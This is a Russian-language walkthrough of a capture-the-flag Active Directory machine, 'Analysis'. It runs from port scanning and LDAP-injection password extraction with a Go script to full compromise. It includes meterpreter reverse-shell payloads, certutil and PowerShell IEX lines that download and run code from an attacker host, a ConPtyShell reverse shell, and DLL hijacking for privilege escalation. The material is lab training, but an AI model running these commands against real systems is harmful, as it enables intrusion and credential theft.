Видео-версия
Все новые прохождения появляются сначала на канале t.me/kiberdruzhinnik. Подпишись, чтобы не пропускать новые!
Обзор сервисов
Сразу же запустим сканирование портов.
$ rustscan --ulimit=5000 --range=1-65535 -a 10.129.11.32 -- -A -sC
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
😵 https://admin.tryhackme.com
[~] The config file is expected to be at "/home/user/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.129.11.32:53
Open 10.129.11.32:88
Open 10.129.11.32:80
Open 10.129.11.32:464
Open 10.129.11.32:445
Open 10.129.11.32:389
Open 10.129.11.32:636
Open 10.129.11.32:593
Open 10.129.11.32:5985
Open 10.129.11.32:3306
Open 10.129.11.32:3269
Open 10.129.11.32:3268
Open 10.129.11.32:9389
Open 10.129.11.32:33060
Open 10.129.11.32:47001
Open 10.129.11.32:49664
Open 10.129.11.32:49665
Open 10.129.11.32:49666
Open 10.129.11.32:49670
Open 10.129.11.32:49667
Open 10.129.11.32:49669
Open 10.129.11.32:49671
Open 10.129.11.32:49674
Open 10.129.11.32:49683
Open 10.129.11.32:49693
Open 10.129.11.32:49708
Open 10.129.11.32:63479
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -A -sC" on ip 10.129.11.32
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-20 14:20 EST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:20
Completed NSE at 14:20, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:20
Completed NSE at 14:20, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:20
Completed NSE at 14:20, 0.00s elapsed
Initiating Ping Scan at 14:20
Scanning 10.129.11.32 [2 ports]
Completed Ping Scan at 14:20, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:20
Completed Parallel DNS resolution of 1 host. at 14:20, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 14:20
Scanning 10.129.11.32 [27 ports]
Discovered open port 445/tcp on 10.129.11.32
Discovered open port 80/tcp on 10.129.11.32
Discovered open port 53/tcp on 10.129.11.32
Discovered open port 3306/tcp on 10.129.11.32
Discovered open port 3269/tcp on 10.129.11.32
Discovered open port 49693/tcp on 10.129.11.32
Discovered open port 49674/tcp on 10.129.11.32
Discovered open port 49683/tcp on 10.129.11.32
Discovered open port 464/tcp on 10.129.11.32
Discovered open port 593/tcp on 10.129.11.32
Discovered open port 3268/tcp on 10.129.11.32
Discovered open port 88/tcp on 10.129.11.32
Discovered open port 49671/tcp on 10.129.11.32
Discovered open port 636/tcp on 10.129.11.32
Discovered open port 49666/tcp on 10.129.11.32
Discovered open port 49667/tcp on 10.129.11.32
Discovered open port 49664/tcp on 10.129.11.32
Discovered open port 389/tcp on 10.129.11.32
Discovered open port 49708/tcp on 10.129.11.32
Discovered open port 63479/tcp on 10.129.11.32
Discovered open port 5985/tcp on 10.129.11.32
Discovered open port 33060/tcp on 10.129.11.32
Discovered open port 49670/tcp on 10.129.11.32
Discovered open port 9389/tcp on 10.129.11.32
Discovered open port 47001/tcp on 10.129.11.32
Discovered open port 49665/tcp on 10.129.11.32
Discovered open port 49669/tcp on 10.129.11.32
Completed Connect Scan at 14:20, 0.10s elapsed (27 total ports)
Initiating Service scan at 14:20
Scanning 27 services on 10.129.11.32
Service scan Timing: About 62.96% done; ETC: 14:21 (0:00:32 remaining)
Completed Service scan at 14:21, 60.48s elapsed (27 services on 1 host)
NSE: Script scanning 10.129.11.32.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:21
Completed NSE at 14:21, 8.83s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:21
Completed NSE at 14:21, 3.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:21
Completed NSE at 14:21, 0.00s elapsed
Nmap scan report for 10.129.11.32
Host is up, received syn-ack (0.050s latency).
Scanned at 2024-01-20 14:20:20 EST for 72s
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
80/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2024-01-20 19:20:26Z)
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: analysis.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: analysis.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack
3306/tcp open mysql syn-ack MySQL (unauthorized)
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack .NET Message Framing
33060/tcp open mysqlx? syn-ack
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
| HY000
| LDAPBindReq:
| *Parse error unserializing protobuf message"
| HY000
| oracle-tns:
| Invalid message-frame."
|_ HY000
47001/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc syn-ack Microsoft Windows RPC
49665/tcp open msrpc syn-ack Microsoft Windows RPC
49666/tcp open msrpc syn-ack Microsoft Windows RPC
49667/tcp open msrpc syn-ack Microsoft Windows RPC
49669/tcp open msrpc syn-ack Microsoft Windows RPC
49670/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc syn-ack Microsoft Windows RPC
49674/tcp open msrpc syn-ack Microsoft Windows RPC
49683/tcp open msrpc syn-ack Microsoft Windows RPC
49693/tcp open msrpc syn-ack Microsoft Windows RPC
49708/tcp open msrpc syn-ack Microsoft Windows RPC
63479/tcp open msrpc syn-ack Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33060-TCP:V=7.94SVN%I=7%D=1/20%Time=65AC1CFA%P=x86_64-pc-linux-gnu%
SF:r(NULL,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(GenericLines,9,"\x05\0\0\0\x
SF:0b\x08\x05\x1a\0")%r(HTTPOptions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(RT
SF:SPRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(RPCCheck,9,"\x05\0\0\0\x0
SF:b\x08\x05\x1a\0")%r(DNSVersionBindReqTCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\
SF:0")%r(DNSStatusRequestTCP,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x0
SF:1\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(Help,9,"\x0
SF:5\0\0\0\x0b\x08\x05\x1a\0")%r(SSLSessionReq,2B,"\x05\0\0\0\x0b\x08\x05\
SF:x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY0
SF:00")%r(TerminalServerCookie,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TLSSess
SF:ionReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\
SF:x1a\x0fInvalid\x20message\"\x05HY000")%r(Kerberos,9,"\x05\0\0\0\x0b\x08
SF:\x05\x1a\0")%r(SMBProgNeg,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(X11Probe,
SF:2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0f
SF:Invalid\x20message\"\x05HY000")%r(FourOhFourRequest,9,"\x05\0\0\0\x0b\x
SF:08\x05\x1a\0")%r(LPDString,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LDAPSear
SF:chReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x
SF:1a\x0fInvalid\x20message\"\x05HY000")%r(LDAPBindReq,46,"\x05\0\0\0\x0b\
SF:x08\x05\x1a\x009\0\0\0\x01\x08\x01\x10\x88'\x1a\*Parse\x20error\x20unse
SF:rializing\x20protobuf\x20message\"\x05HY000")%r(SIPOptions,9,"\x05\0\0\
SF:0\x0b\x08\x05\x1a\0")%r(LANDesk-RC,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(
SF:TerminalServer,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NCP,9,"\x05\0\0\0\x0
SF:b\x08\x05\x1a\0")%r(NotesRPC,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0
SF:\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(JavaRMI,
SF:9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(WMSRequest,9,"\x05\0\0\0\x0b\x08\x0
SF:5\x1a\0")%r(oracle-tns,32,"\x05\0\0\0\x0b\x08\x05\x1a\0%\0\0\0\x01\x08\
SF:x01\x10\x88'\x1a\x16Invalid\x20message-frame\.\"\x05HY000")%r(afp,2B,"\
SF:x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInval
SF:id\x20message\"\x05HY000")%r(giop,9,"\x05\0\0\0\x0b\x08\x05\x1a\0");
Service Info: Host: DC-ANALYSIS; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-01-20T19:21:24
|_ start_date: N/A
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 38616/tcp): CLEAN (Couldn't connect)
| Check 2 (port 32463/tcp): CLEAN (Couldn't connect)
| Check 3 (port 17404/udp): CLEAN (Timeout)
| Check 4 (port 23246/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: 0s
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:21
Completed NSE at 14:21, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:21
Completed NSE at 14:21, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:21
Completed NSE at 14:21, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.83 seconds
Добавим хост analysis.htb
в /etc/hosts
и запустим gobuster.
Видим в портах DNS-сервер, поэтому попробуем перебирать домены.
$ gobuster dns -d analysis.htb -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt -r analysis.htb:53
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Domain: analysis.htb
[+] Threads: 10
[+] Resolver: analysis.htb:53
[+] Timeout: 1s
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt
===============================================================
Starting gobuster in DNS enumeration mode
===============================================================
Found: www.analysis.htb
Found: internal.analysis.htb
Found: gc._msdcs.analysis.htb
Found: domaindnszones.analysis.htb
Found: forestdnszones.analysis.htb
Progress: 19966 / 19967 (99.99%)
===============================================================
Finished
===============================================================
Так же занесем эти домены в /etc/hosts
.
Внутренний портал
Просто так нас не пускают.
С помощью gobuster находим форму для логина.
http://internal.analysis.htb/employees/login.php
Поиск валидных имен пользователей
cp /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt possible-usernames.txt
sed -i "s|$|@analysis.htb|" possible-usernames.txt
./kerbrute userenum -d analysis.htb possible-usernames.txt --dc analysis.htb
LDAP инъекция
В итоге после некоторого количества запусков gobuster находим ссылку http://internal.analysis.htb/users/list.php
.
Пробуем угадать параметр и приходим в итоге к name
.
Попробуем внедрить *
и получим имя пользователя:
Воспользуемся скриптом для брута пароля пользователя.
package main
import (
"bufio"
"fmt"
"io/ioutil"
"net/http"
"os"
"strings"
)
func main() {
// Prompt user for wordlist input
fmt.Print("Enter the wordlist or charset (press Enter to use the default): ")
scanner := bufio.NewScanner(os.Stdin)
scanner.Scan()
charsetPath := strings.TrimSpace(scanner.Text())
// Use default wordlist if user didn't provide one
if charsetPath == "" {
charsetPath = "/usr/share/seclists/Fuzzing/alphanum-case-extra.txt"
}
baseURL := "http://internal.analysis.htb/users/list.php?name=*)(%26(objectClass=user)(description={found_char}{FUZZ}*)"
foundChars := ""
file, err := os.Open(charsetPath)
if err != nil {
fmt.Println("Error opening charset file:", err)
return
}
defer file.Close()
scanner = bufio.NewScanner(file)
for scanner.Scan() {
char := strings.TrimSpace(scanner.Text())
//fmt.Println("Trying character:", char)
//thisisthat := "OnlyWorkingInput:"
modifiedURL := strings.Replace(baseURL, "{FUZZ}", char, 1)
modifiedURL = strings.Replace(modifiedURL, "{found_char}", foundChars, 1)
fmt.Println("Modified URL:", modifiedURL)
//fmt.Println(thisisthat,"{found_char}",foundChars, 1)
response, err := http.Get(modifiedURL)
if err != nil {
fmt.Println("Error making HTTP request:", err)
return
}
defer response.Body.Close()
body, err := ioutil.ReadAll(response.Body)
if err != nil {
fmt.Println("Error reading response body:", err)
return
}
if strings.Contains(response.Status, "200 OK") && strings.Contains(string(body), "technician") {
fmt.Println("Found character:", char)
foundChars += char
file.Seek(0, 0) // Move the file pointer to the beginning for another iteration
}
}
if err := scanner.Err(); err != nil {
fmt.Println("Error reading charset file:", err)
return
}
fmt.Println("Final found characters:", foundChars)
}
Скрипт перебирает символы. Если встречает на странице никнейм technician
, то запоминает символ. Скрипт не идеальный, но позволяет нам подобрать половину пароля до символа *
.
Далее подбираем с помощью следующего подхода: http://internal.analysis.htb/users/list.php?name=*)(%26(objectClass=user)(description=*)
.
$ ./kerbrute bruteuser -d analysis.htb --dc analysis.htb passwords.txt technician
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (n/a) - 01/21/24 - Ronnie Flathers @ropnop
2024/01/21 03:01:49 > Using KDC(s):
2024/01/21 03:01:49 > analysis.htb:88
2024/01/21 03:01:49 > [!] [email protected]: - client has neither a keytab nor a password set and no session
2024/01/21 03:01:49 > [+] VALID LOGIN: [email protected]:pwd
2024/01/21 03:01:49 > Done! Tested 2 logins (1 successes) in 0.284 seconds
Полученный пароль применим на странице http://internal.analysis.htb/employees/login.php
.
Перейдем на вкладу Soc Report
и загрузим любой PHP webshell.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=4242 -f exe -o s.exe
msfconsole
use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost tun0
set lport 4242
run
python3 -m http.server 8081
certutil -urlcache -f http://10.10.14.98:8081/s.exe %temp%/s.exe
start %temp%/s.exe
Возможно, полезное
C:\inetpub\internal\users>type list.php
type list.php
<?php
//LDAP Bind paramters, need to be a normal AD User account.
error_reporting(0);
$ldap_password = 'pwd2';
$ldap_username = '[email protected]';
C:\inetpub\internal\employees>type login.php
type login.php
<?php
$host = "localhost";
$username = "db_master";
$password = 'pwd3';
$database = "employees";
RunasCs как webservice
wget https://raw.githubusercontent.com/antonioCoco/RunasCs/master/RunasCs.cs
mcs RunasCs.cs
Загрузим бинарник RunasCs.exe
на машину.
cd C:/Windows/TEMP
upload RunasCs.exe runascs.exe
https://github.com/antonioCoco/ConPtyShell/blob/master/Invoke-ConPtyShell.ps1
wget https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1
python3 -m http.server 8081
Кастомный вызов nc
на локальной машине:
stty raw -echo; (stty size; cat) | nc -lvnp 4243
В meterpreter как techinican
:
runascs.exe "webservice" "pwd2" "powershell.exe -c IEX(IWR -UseBasicParsing 'http://10.10.14.98:8081/Invoke-ConPtyShell.ps1'); Invoke-ConPtyShell -RemoteIp 10.10.14.98 -RemotePort 4243 -Rows 120 -Cols 38 -CommandLine cmd.exe" -d "analysis.htb"
В консоли как webservice
:
powershell -c "cmd /c certutil -urlcache -f http://10.10.14.98:8081/s4.exe %temp%/s4.exe"
start %temp%/s4.exe
https://github.com/itm4n/PrivescCheck
wget https://raw.githubusercontent.com/itm4n/PrivescCheck/master/PrivescCheck.ps1
upload PrivescCheck.ps1
powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended -Report PrivescCheck_$($env:COMPUTERNAME) -Format HTML"
Включен autologon:
Повторяем, но уже с новым паролем:
runascs.exe "jdoe" "pwd4" "powershell.exe -c IEX(IWR -UseBasicParsing 'http://10.10.14.98:8081/Invoke-ConPtyShell.ps1'); Invoke-ConPtyShell -RemoteIp 10.10.14.98 -RemotePort 4243 -Rows 120 -Cols 38 -CommandLine cmd.exe" -d "analysis.htb"
powershell -c "cmd /c certutil -urlcache -f http://10.10.14.98:8081/s4.exe %temp%/s4.exe"
start %temp%/s4.exe
Флаг пользователя
Повышение привилегий
Переподключимся как jdoe
:
$ evil-winrm -u jdoe -i analysis.htb -p 'pwd4'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\jdoe\Documents>
Неверный путь
*Evil-WinRM* PS C:\snort\lib> icacls snort_dynamicpreprocessor
snort_dynamicpreprocessor AUTORITE NT\SystŠme:(I)(OI)(CI)(F)
BUILTIN\Administrateurs:(I)(OI)(CI)(F)
BUILTIN\Utilisateurs:(I)(OI)(CI)(RX)
BUILTIN\Utilisateurs:(I)(CI)(AD)
BUILTIN\Utilisateurs:(I)(CI)(WD)
CREATEUR PROPRIETAIRE:(I)(OI)(CI)(IO)(F)
Successfully processed 1 files; Failed processing 0 files
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=4242 -f dll -o sf_shell.dll
upload sf_shell.dll C:/snort/lib/snort_dynamicpreprocessor